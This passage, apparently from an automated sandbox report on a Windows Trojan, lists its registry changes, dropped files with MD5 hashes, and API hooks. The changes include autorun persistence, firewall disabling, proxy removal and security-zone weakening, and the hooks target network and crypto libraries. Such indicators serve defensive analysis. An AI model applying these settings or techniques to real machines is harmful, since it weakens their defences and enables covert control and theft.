"CacheLimit" = "65452"
[HKCU\Software\e307dfcb0a]
"5119f545" = "LYadYVJLPJ6WFfkaGJmh1WqO=90dkhY45AlhE0gMXxkNmqXwE8e2txGDSBsQMhqnNDOde3U7APQ2AdzFaFQyAjcWRkMGtNkEinSrCp9WEJNa7mP3KdBAcqeouzXMuRbzg99c;PlJgsEhUsHCleD6ghacNrUC=S3L11WmVIXP5YjCibX0UhQDUuLZbmZaMWqkeI2vZev7xCrBSnKue;SeKSu6wcaioFvLSwT3jIuPkz=x1BSabs3aKbNrsKO4v3nrWjVGLHZciGKw89gNSBGTBBHsJsx53bTvqNFyHp4CVCQnInJGCzeEpc9ZHSG;fZAEAKboFDB25oUyYzMQrGMFM=k6s2nq55NWdxAmzlsPornZgTYWNhitD8b9zxSACaPLgO6mE0bsuNBgiInfNMbL0squyGNMEqnbuEs2nT8HqHtlYYPaLnBU1KowDo8vcu3;zLZkci9uF0HlfZQJIeFVSi=F7Nsr9WmKoz44DK4qikwPA5kJqVXfPDTrAfrv2mSRfEjj3hLSb8KZE7tzaqNP6PFuU9DAw;G4pjOlwUamMdAQLhlJz=SlRjoYB5xvr4BkB8nPlXmHhtHRBMxCsSSs9JehH7PQQ3V;XIiOntCrABujiSqWQ3w=rFcHYIJYtMQDxtZ22uBbpL2jQhUJ2EnpdpeQ3G;kowKgLTtT6IMWApdSHika=JJj0qxRd0hjt5wx5b298ADjcNYZtwMruR8EAUTYflkEZKJF2ehzgpB4s7Y2dAQcJ3DkhI79Dd1r6Xra89BjP4eqU73Klo42I4YfR0d5xBkwn0MBIjKijHAhRZwLSzW5;oPLZpDtij9TZchaPfTkpADOw=9KJwm6xKi1wrFiYP3nXhozkCxVnIZ03VBZL04i6b7rmihZEFf8OsRncdKM6Kmq6cyZt5FkiWaxhchVPoTTiW5RUMmxzgnMRan6XudDZYJI1AKyKPkmQhEN0wpyPD7uEk3Qda;qZj1=2B083C3F6D760F02321317631."
"0494a3ce" = "1442757180"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "66 F0 14 C2 8F EA B5 14 E4 A6 53 3C BD 8F 71 BD"
[HKLM\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION]
"regsvr32.exe" = "8888"
[HKCU\Software\e307dfcb0a]
"5232108f" = "ÈwûFª2°p~,¤eÅ’@Èú×¼H«€â’™å- î¬l«•ðøïw·(¿é燧,ÂK«8GÃÂt9mFù„zËœ-ßô‚]ꨧÖ×mà`fhêç‡/«ÂÂhܰremIèÑyDÈ6 ˆŸGâ€ÂôÂÂ?1ËœußXV@@¿°2iVT©ÂÂÃÂãà¯ÉÛ)ŠÕ9NÅ“J:4Ã’Å m¸¾ ¢7G¯Åü•ÇÌM¦M\‰õÌgPshŒäùgi5&â€ÂÂÂ𮨩(;°REøÂ¸[>œ–.kZnv)8iÕBû.V±38U‚H- ÕøGá=ž=B±‡uÕµyáCÂÂ91wo{¢Aû8ÂÂoò¨ƒ@‹^×ÃÂdð2žë~GU¹ÿš@Čլ7fQ0.,ˆ|ÃûЦYÙ]½oes¶‹´"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1]
"2300" = "0"
[HKLM\SOFTWARE\e307dfcb0a]
"52b1e748" = "6C198210E7D1FFE5"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1]
"1206" = "0"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3]
"1809" = "3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
[HKCU\Software\e307dfcb0a]
"52b1e748" = "6C198210E7D1FFE5"
[HKLM\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION]
"iexplore.exe" = "8888"
[HKCU\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION]
"iexplore.exe" = "8888"
[HKLM\SOFTWARE\e307dfcb0a]
"0494a3ce" = "1442757180"
[HKCU\Software\Microsoft\Urfapo]
"Awxi" = "00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"
To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"c:\documents and settings\"%CurrentUserName%"\local settings\application data\fadehi\fadehi.exe."
The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:
"ProxyBypass" = "1"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"c:\documents and settings\"%CurrentUserName%"\local settings\application data\fadehi\fadehi.exe "
The Trojan deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyOverride"
"ProxyServer"
"AutoConfigURL"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\Run]
The Trojan disables automatic startup of the application by deleting the following autorun value:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
The process regsvr32.exe:3404 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1E 00 00 00 01 00 00 00 00 00 00 00"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKCU\Software\e307dfcb0a]
"8d8063dd" = "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\e307dfcb0a]
"8d8063dd" = "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp]
"WindowsXP-KB968930-x86-ENG.exe" = "Self-Extracting Cabinet"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "D5 D2 64 B9 07 33 33 10 81 22 6C 05 95 05 A8 AE"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
[HKLM\SOFTWARE\BC91AD57E73BCB11448]
"D43673142A7803D5E" = "D43673142A7803D5E"
[HKLM\SOFTWARE\370B7A67EEBD84F6926B]
"DEF5A832C6F4203B2" = "DEF5A832C6F4203B2"
[HKCU\Software\Microsoft\Urfapo]
"Awxi" = "00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"
The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:
"ProxyBypass" = "1"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The Trojan deletes the following registry key(s):
[HKLM\SOFTWARE\370B7A67EEBD84F6926B]
[HKLM\SOFTWARE\BC91AD57E73BCB11448]
The Trojan deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
[HKLM\SOFTWARE\370B7A67EEBD84F6926B]
"DEF5A832C6F4203B2"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyOverride"
[HKLM\SOFTWARE\BC91AD57E73BCB11448]
"D43673142A7803D5E"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyServer"
The process regsvr32.exe:3200 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "9C 9B 33 0E AA E1 AE 01 AB AA 92 34 F2 AD DA 66"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKCU\Software\Microsoft\Urfapo]
"Awxi" = "00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"
The process wsmanhttpconfig.exe:3232 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "51 74 09 EA 1C 03 27 B8 EF A7 47 AA A5 7F 1C 7E"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKCU\Software\Microsoft\Urfapo]
"Awxi" = "00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"
The process wsmanhttpconfig.exe:1960 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "5F 70 27 85 1A FF 0E 1F 70 1A 1D 36 51 E7 59 47"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN\Plugin\Event Forwarding Plugin]
"ConfigXML" = ""
[HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List]
"80:TCP" = "80:TCP:*:Enabled:Windows Remote Management - Compatibility Mode (HTTP-In)"
[HKLM\System\CurrentControlSet\Services\HTTP\Parameters\UrlAclInfo]
"http:// :47001/wsman/" = "01 00 04 80 00 00 00 00 00 00 00 00 00 00 00 00"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\System\CurrentControlSet\Services\HTTP\Parameters\UrlAclInfo]
"https:// :5986/wsman/" = "01 00 04 80 00 00 00 00 00 00 00 00 00 00 00 00"
[HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List]
"5985:TCP" = "5985:TCP:*:Enabled:Windows Remote Management"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN]
"UpdatedConfig" = "D43F50A7-7CCC-43E7-9E47-8D49C8B4D82A"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN\Plugin\WMI Provider]
"ConfigXML" = ""
[HKLM\System\CurrentControlSet\Services\HTTP\Parameters\UrlAclInfo]
"http:// :5985/wsman/" = "01 00 04 80 00 00 00 00 00 00 00 00 00 00 00 00"
[HKCU\Software\Microsoft\Urfapo]
"Awxi" = "00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"
The process netsh.exe:2304 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy\traceIdentifier]
"Guid" = "5f31090b-d990-4e91-b16d-46121d0255aa"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\qagent]
"Active" = "1"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil\traceIdentifier]
"Guid" = "8aefce96-4618-42ff-a057-3536aa78233e"
[HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile]
"DoNotAllowExceptions" = "0"
[HKLM\SOFTWARE\Microsoft\Tracing\FWCFG]
"MaxFileSize" = "1048576"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\NAP\Netsh]
"ControlFlags" = "1"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\qagent]
"ControlFlags" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\NAP\Netsh]
"Active" = "1"
[HKLM\SOFTWARE\Microsoft\Tracing\FWCFG]
"ConsoleTracingMask" = "4294901760"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\NAP\Netsh\Napmontr]
"BitNames" = " NAP_TRACE_BASE NAP_TRACE_NETSH"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"Active" = "1"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"Active" = "1"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"ControlFlags" = "1"
[HKLM\SOFTWARE\Microsoft\Tracing\FWCFG]
"EnableFileTracing" = "0"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"LogSessionName" = "stdout"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\NAP\Netsh\Napmontr]
"Guid" = "710adbf0-ce88-40b4-a50d-231ada6593f0"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"Active" = "1"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"LogSessionName" = "stdout"
"ControlFlags" = "1"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\qagent\traceIdentifier]
"Guid" = "b0278a28-76f1-4e15-b1df-14b209a12613"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg\traceIdentifier]
"Guid" = "5f31090b-d990-4e91-b16d-46121d0255aa"
[HKLM\SOFTWARE\Microsoft\Tracing\FWCFG]
"EnableConsoleTracing" = "0"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "2D 2B BC DB F3 4F AE E6 9B E1 BF C4 D2 AC D2 EC"
[HKLM\SOFTWARE\Microsoft\Tracing\FWCFG]
"FileDirectory" = "%windir%\tracing"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"LogSessionName" = "stdout"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\qagent]
"LogSessionName" = "stdout"
[HKLM\SOFTWARE\Microsoft\Tracing\FWCFG]
"FileTracingMask" = "4294901760"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\NAP\Netsh]
"LogSessionName" = "stdout"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\qagent\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"ControlFlags" = "1"
[HKCU\Software\Microsoft\Urfapo]
"Awxi" = "00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"
A firewall is disabled:
[HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile]
"EnableFirewall" = "0"
The process bindata865.exe:3088 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "72 0A 06 0C F8 80 1C B1 1C 78 63 AA 64 40 B3 92"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Urfapo]
"Awxi" = "00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"
The Trojan deletes the following registry key(s):
[HKLM\SOFTWARE]
The Trojan deletes the following value(s) in system registry:
[HKLM\SOFTWARE]
"(Default)"
Dropped PE files
MD5 | File path |
---|---|
40bafdbf7f27041cef77b05441f9b0c4 | c:\Documents and Settings\"%CurrentUserName%"\Application Data\Olifiqtu\yfenaromaf.exe |
6f2813669b17c1d1a74507d352b126d8 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Application Data\fadehi\fadehi.exe |
9859a26d5e72bbb0685af813b409d99d | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\WindowsXP-KB968930-x86-ENG.exe |
d510b5b91adbf3479ef0adc04f00e34c | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\tmp4d895b52\new.exe |
85d7ab466d0577c49fc9879107ec7ef5 | c:\ea4acb66495575d6b9f323\compiledcomposition.microsoft.powershell.gpowershell.dll |
2f7fe3a781ba8c0a67c775f20e3e9f70 | c:\ea4acb66495575d6b9f323\microsoft.backgroundintelligenttransfer.management.dll |
173d3dd1425a8e33fa1d4ed71067a3a2 | c:\ea4acb66495575d6b9f323\microsoft.backgroundintelligenttransfer.management.interop.dll |
75c183e262bd4400eb0f20349f6ef383 | c:\ea4acb66495575d6b9f323\microsoft.backgroundintelligenttransfer.management.resources.dll |
08e87e8abf7b41b28663dce817ce0ab6 | c:\ea4acb66495575d6b9f323\microsoft.powershell.commands.diagnostics.dll |
4e2482e69baaf3a5b13db8101c063ebf | c:\ea4acb66495575d6b9f323\microsoft.powershell.commands.diagnostics.resources.dll |
f3ac3f844f90380aab2b4c0836c4288f | c:\ea4acb66495575d6b9f323\microsoft.powershell.commands.management.dll |
b87e087fc013225e2aa1cb60c080647d | c:\ea4acb66495575d6b9f323\microsoft.powershell.commands.management.resources.dll |
dfeb401cc051e5da721c584ff6a90f88 | c:\ea4acb66495575d6b9f323\microsoft.powershell.commands.utility.dll |
1ce73fb3f88c716cfc3fd550547d2b35 | c:\ea4acb66495575d6b9f323\microsoft.powershell.commands.utility.resources.dll |
3991b7fa452a9c9c291c06365a236792 | c:\ea4acb66495575d6b9f323\microsoft.powershell.consolehost.dll |
36ff641f37918f2cca98e7f407ac4d75 | c:\ea4acb66495575d6b9f323\microsoft.powershell.consolehost.resources.dll |
208fa9d0ebe2ceb9616042772e96598e | c:\ea4acb66495575d6b9f323\microsoft.powershell.editor.dll |
37bed865557084dd9988350ab1675e0b | c:\ea4acb66495575d6b9f323\microsoft.powershell.editor.resources.dll |
d4eefccdc3de6ced901535fa4153c491 | c:\ea4acb66495575d6b9f323\microsoft.powershell.gpowershell.dll |
108500a98b9a2f66823e7615398fc87b | c:\ea4acb66495575d6b9f323\microsoft.powershell.gpowershell.resources.dll |
3eab4dbdc290edc4d53fe77f1fdb9e59 | c:\ea4acb66495575d6b9f323\microsoft.powershell.graphicalhost.dll |
5a69fb5d686f863e0e13268d671ef16d | c:\ea4acb66495575d6b9f323\microsoft.powershell.graphicalhost.resources.dll |
53a9d748ef09920a0d06da2583c298ad | c:\ea4acb66495575d6b9f323\microsoft.powershell.security.dll |
c7a0d1321a67a2afd330c5fbe79befd1 | c:\ea4acb66495575d6b9f323\microsoft.powershell.security.resources.dll |
1a4e900c2fe3cd31d10107670d184fe6 | c:\ea4acb66495575d6b9f323\microsoft.wsman.management.dll |
6372ea7d2aced7185183cf3fcdd3577b | c:\ea4acb66495575d6b9f323\microsoft.wsman.management.resources.dll |
f7da27672d2e4c21a1f996ee31de0dbf | c:\ea4acb66495575d6b9f323\microsoft.wsman.runtime.dll |
df4217ddb34a0b73dc7aac7829371c0c | c:\ea4acb66495575d6b9f323\powershell.exe |
fe7bc06af17d7cd8fb8e6d72d72453b8 | c:\ea4acb66495575d6b9f323\powershell.exe.mui |
36b6f71b6d7d280302b348145db05a9f | c:\ea4acb66495575d6b9f323\powershell_ise.exe |
cb3a534127f37d0fa1f556dbb76575d3 | c:\ea4acb66495575d6b9f323\powershell_ise.resources.dll |
fc9a05096522bb6d7ceda62ea1707420 | c:\ea4acb66495575d6b9f323\pscustomsetuputil.exe |
95b7f12a557dedac5e4a1e9afa5e73ab | c:\ea4acb66495575d6b9f323\pspluginwkr.dll |
35efd8cd6549a4339cb2a28c8cfd6598 | c:\ea4acb66495575d6b9f323\pssetupnativeutils.exe |
a94243b797377ba03b63fc716c13bcf5 | c:\ea4acb66495575d6b9f323\pwrshmsg.dll |
8c386819bf5b39d7a4b274d0b55f87a5 | c:\ea4acb66495575d6b9f323\pwrshplugin.dll |
7943a80f1a6fd37969aacd411b511f91 | c:\ea4acb66495575d6b9f323\pwrshsip.dll |
066f7fcca265d01a5b7eaf41ade789b1 | c:\ea4acb66495575d6b9f323\spmsg.dll |
a39df582ca051afc8811fbd00db12f10 | c:\ea4acb66495575d6b9f323\spuninst.exe |
1b2c60a6d6c3833b413943862b2bfed8 | c:\ea4acb66495575d6b9f323\spupdsvc.exe |
4d8ab4fad244f7985d8c59d456e026d7 | c:\ea4acb66495575d6b9f323\system.management.automation.dll |
2286b57ecc2d32d24049c51989084268 | c:\ea4acb66495575d6b9f323\system.management.automation.resources.dll |
5d6d17b645fa91fce7f0712f3da4f297 | c:\ea4acb66495575d6b9f323\update\spcustom.dll |
50914702cb6c72275018643c557ef8c5 | c:\ea4acb66495575d6b9f323\update\update.exe |
9a055da2f2819f155c33d47cd67a7c00 | c:\ea4acb66495575d6b9f323\update\updspapi.dll |
84e025b1259c66315f4d45a6caecacc9 | c:\ea4acb66495575d6b9f323\wevtfwd.dll |
cd17705af8e53a82facb545a213ab09c | c:\ea4acb66495575d6b9f323\winrmprov.dll |
afdf7654880ce23005014895b129d948 | c:\ea4acb66495575d6b9f323\winrs.exe |
3e9b11880ae4a8ff399ce0573c82655b | c:\ea4acb66495575d6b9f323\winrscmd.dll |
62021e3e6ba13d72cf5cc1047cfac991 | c:\ea4acb66495575d6b9f323\winrshost.exe |
b84092e52861a026fc83bcede4a7abfa | c:\ea4acb66495575d6b9f323\winrsmgr.dll |
35bc7c49676e5ab617ef94dc9854a6f1 | c:\ea4acb66495575d6b9f323\winrssrv.dll |
972916faac89c4aa978952b30f478e81 | c:\ea4acb66495575d6b9f323\wsmanhttpconfig.exe |
2c9c9ae86eb2b4e78c8e09deb7509a63 | c:\ea4acb66495575d6b9f323\wsmauto.dll |
23ce21efc2ae95700f2b1f9582fe3867 | c:\ea4acb66495575d6b9f323\wsmplpxy.dll |
faa2fcc6853e5123e05dccc5919657e2 | c:\ea4acb66495575d6b9f323\wsmprovhost.exe |
67146d3606be1111a39f0fd61f47e9b6 | c:\ea4acb66495575d6b9f323\wsmres.dll |
18f347402da544a780949b8fdf83351b | c:\ea4acb66495575d6b9f323\wsmsvc.dll |
296e6992278fea7140d88b603e6c2a8a | c:\ea4acb66495575d6b9f323\wsmwmipl.dll |
HOSTS file anomalies
No changes have been detected.
Rootkit activity
The Trojan installs the following user-mode hooks in WININET.dll:
HttpEndRequestW
HttpEndRequestA
HttpSendRequestExA
HttpSendRequestW
InternetReadFileExA
InternetSetFilePointer
InternetQueryDataAvailable
HttpOpenRequestW
HttpSendRequestExW
InternetReadFile
HttpQueryInfoA
HttpSendRequestA
InternetCloseHandle
HttpOpenRequestA
The Trojan installs the following user-mode hooks in CRYPT32.dll:
PFXImportCertStore
The Trojan installs the following user-mode hooks in USER32.dll:
GetClipboardData
PeekMessageW
GetMessageW
The Trojan installs the following user-mode hooks in ADVAPI32.dll:
CreateProcessAsUserA
CreateProcessAsUserW
RegQueryValueExA
RegQueryValueExW
The Trojan installs the following user-mode hooks in WS2_32.dll:
WSASend
gethostbyname
send
closesocket
getaddrinfo
